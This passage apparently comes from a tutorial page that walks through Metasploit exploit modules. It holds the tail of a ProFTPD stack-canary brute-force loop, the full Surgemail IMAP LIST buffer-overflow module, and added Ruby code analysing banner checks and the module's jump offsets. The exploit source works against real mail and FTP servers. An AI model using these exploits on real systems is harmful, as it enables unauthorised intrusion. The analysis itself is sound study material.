          qps = ((cookie - last_cookie) >> 8) / 10.0
          print_status("%.2f%% complete, %.2f attempts/sec - Trying: 0x%x" % [perc, qps, cookie])
          last = now
          last_cookie = cookie
        end

        # One fresh connection per guess: a wrong guess kills the forked child,
        # but the parent's canary, and so the next child's, stays the same.
        sd = connect(false)
        sd.get_once
        buf[off, 4] = [cookie].pack('V')
        sd.put(buf)
        sd.close

        # The low byte of a glibc stack canary is always 0x00, hence the 0x100
        # step and the 24 bits of entropy mentioned above.
        cookie += 0x100
        break if cookie > max
      end

      if not session_created?
        raise RuntimeError, "Unable to guess the cookie value, sorry :-/"
      end
    else
      sock.put(buf)
      handler
      disconnect
    end
  end

end


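The banner test inside check is the part of this module worth exercising on its own, because it decides whether the framework reports Safe or Vulnerable before anything is sent. The following is an added example, not the module's code: the same version logic as a pure function over sample banners (constructed here to look like ProFTPD's 220 greeting). It differs from the module in one respect: the module's regex /ProFTPD (1\.3\.[23][^ ])/ captures exactly one character after the patch level, so "1.3.2rc2" and "1.3.2rc3" both reach the version test as "1.3.2r" and the rc-number branch never sees "rc". This version captures the whole token, so the rc3 boundary of CVE-2010-4221 is actually enforced.

```ruby
# Standalone version of the module's banner check. Returns the CheckCode
# name as a symbol: :safe, :detected, :vulnerable, or :unknown for no banner.
def proftpd_check(banner)
  return :unknown if banner.nil? || banner.strip.empty?
  return :safe unless banner =~ /ProFTPD/i                 # some other FTP daemon
  m = banner.match(/ProFTPD (\d+)\.(\d+)\.(\d+)(\S*)/i)
  return :detected unless m                                 # ProFTPD, but version hidden
  maj, min, rel = m[1].to_i, m[2].to_i, m[3].to_i
  suffix = m[4].downcase                                    # "", "a".."e", "rc3", ...
  return :safe unless maj == 1 && min == 3

  case rel
  when 2
    if (rc = suffix[/\Arc(\d+)\z/, 1])
      rc.to_i >= 3 ? :vulnerable : :safe                    # rc3 is the first affected build
    else
      :vulnerable                                           # 1.3.2 final and 1.3.2a..e
    end
  when 3
    if suffix.start_with?('rc') || suffix.empty? || suffix <= 'b'
      :vulnerable                                           # up to and including 1.3.3b
    else
      :safe                                                 # 1.3.3c fixed it
    end
  else
    :safe
  end
end

# Constructed banners with the expected verdict; the bracketed address mimics
# what ProFTPD appends to its greeting.
SAMPLE_BANNERS = {
  '220 ProFTPD 1.3.2rc2 Server (ProFTPD Default Installation) [::ffff:10.0.0.5]' => :safe,
  '220 ProFTPD 1.3.2rc3 Server (ProFTPD Default Installation) [::ffff:10.0.0.5]' => :vulnerable,
  '220 ProFTPD 1.3.2e Server (Debian) [::ffff:10.0.0.5]'                          => :vulnerable,
  '220 ProFTPD 1.3.3a Server (Debian) [::ffff:10.0.0.5]'                          => :vulnerable,
  '220 ProFTPD 1.3.3b Server [::ffff:10.0.0.5]'                                   => :vulnerable,
  '220 ProFTPD 1.3.3c Server [::ffff:10.0.0.5]'                                   => :safe,
  '220 ProFTPD 1.3.4 Server [::ffff:10.0.0.5]'                                    => :safe,
  '220 ProFTPD Server ready.'                                                     => :detected,
  '220 (vsFTPd 2.3.4)'                                                            => :safe
}.freeze

# Banners whose verdict differs from the expectation; empty means all agree.
def check_mismatches
  SAMPLE_BANNERS.reject { |banner, expect| proftpd_check(banner) == expect }.keys
end

SAMPLE_BANNERS.each_key { |b| puts "#{proftpd_check(b)}\t#{b}" } if __FILE__ == $PROGRAM_NAME
```

A version-only check can never return Vulnerable with certainty (a distribution may have backported the fix), which is what CheckCode::Appears exists for in later framework versions; the module above, like most of its era, reports Vulnerable on version alone.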





The second module on the page, the Surgemail IMAP exploit shown in Figure 13 as a newly added exploit, follows the same skeleton:

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Imap

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Surgemail 3.8k4-4 IMAPD LIST Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack overflow in the Surgemail IMAP Server
        version 3.8k4-4 by sending an overly long LIST command. Valid IMAP
        account credentials are required.
      },
      'Author'         => [ 'ryujin' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 1 $',
      'References'     =>
        [
          [ 'BID', '28260' ],
          [ 'CVE', '2008-1498' ],
          [ 'URL', '' ],
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'       => 10351,
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'DisableNops' => true,
          'BadChars'    => "\x00"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', { 'Ret' => "\x7e\x51\x78" } ], # p/p/r 0x0078517e
        ],
      'DisclosureDate' => 'March 13 2008',
      'DefaultTarget'  => 0))
  end

  def check
    # The Imap mixin reads the server greeting into +banner+ on connect
    connect
    disconnect
    if (banner and banner =~ /(Version 3.8k4-4)/)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connected = connect_login
    nopes = "\x90"*(payload_space-payload.encoded.length) # to be fixed with make_nops()
    sjump = "\xEB\xF9\x90\x90"     # Jmp Back
    njump = "\xE9\xDD\xD7\xFF\xFF" # And Back Again Baby ;)
    evil = nopes + payload.encoded + njump + sjump + [target.ret].pack("A3")
    print_status("Sending payload")
    sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
    sock.put(sploit)
    handler
    disconnect
  end

end












Figure 13: using the newly added surgemail exploit


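The two jump constants in the Surgemail module ("\xEB\xF9" and "\xE9\xDD\xD7\xFF\xFF") are the part most readers take on faith. The following is an added example, my own code rather than the module's: it encodes and decodes x86 relative jumps and recomputes, from the module's own layout constants (payload space 10351, a 5-byte near jump, a 2-byte short jump padded with two NOPs, a 3-byte pop/pop/ret address), where each jump lands. Reading the trailing bytes as an SEH record (short jump in the next-handler slot, pop/pop/ret in the handler slot) is my interpretation of the "p/p/r" comment; the arithmetic does not depend on it.

```ruby
# x86 relative jumps: "jmp rel8" (EB xx) and "jmp rel32" (E9 xx xx xx xx).
# The displacement is measured from the end of the jump instruction.
def jmp_short(from_end, to)
  rel = to - from_end
  raise ArgumentError, "rel8 out of range: #{rel}" unless (-128..127).cover?(rel)
  "\xEB".b + [rel].pack('c')
end

def jmp_near(from_end, to)
  "\xE9".b + [to - from_end].pack('l<')
end

def jump_displacement(ins)
  case ins.getbyte(0)
  when 0xEB then ins.byteslice(1, 1).unpack1('c')
  when 0xE9 then ins.byteslice(1, 4).unpack1('l<')
  else raise ArgumentError, 'not a jmp'
  end
end

# The module's buffer: nopes + payload (PAYLOAD_SPACE bytes together), then
# njump (5 bytes), sjump (2 bytes + two NOPs), then the 3-byte p/p/r address.
# pop/pop/ret returns into sjump; sjump hops back over itself into njump;
# njump hops back over the whole payload into the NOP sled.
PAYLOAD_SPACE = 10351
SJUMP = "\xEB\xF9\x90\x90".b
NJUMP = "\xE9\xDD\xD7\xFF\xFF".b

def surgemail_layout(payload_len, space = PAYLOAD_SPACE)
  nopes      = space - payload_len
  njump_at   = space            # first byte after nopes + payload
  sjump_at   = njump_at + 5
  sjump_dest = sjump_at + 2 + jump_displacement(SJUMP)   # from the end of the 2-byte jmp
  njump_dest = njump_at + 5 + jump_displacement(NJUMP)   # from the end of the 5-byte jmp
  {
    nop_sled_bytes: nopes,
    sjump_target:   sjump_dest,
    sjump_ok:       sjump_dest == njump_at,
    njump_target:   njump_dest,
    lands_in_sled:  njump_dest >= 0 && njump_dest < nopes
  }
end

if __FILE__ == $PROGRAM_NAME
  [5000, 10300].each { |len| puts "payload #{len}: #{surgemail_layout(len).inspect}" }
end
```

The near jump always lands at offset 81 of the buffer, so the module only works while the encoded payload is shorter than about 10270 bytes; with a larger payload the jump lands inside the payload instead of the sled, which is the kind of fixed-offset assumption the module's own "to be fixed with make_nops()" comment hints at.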



Published: 2024-03-23 20:02:08

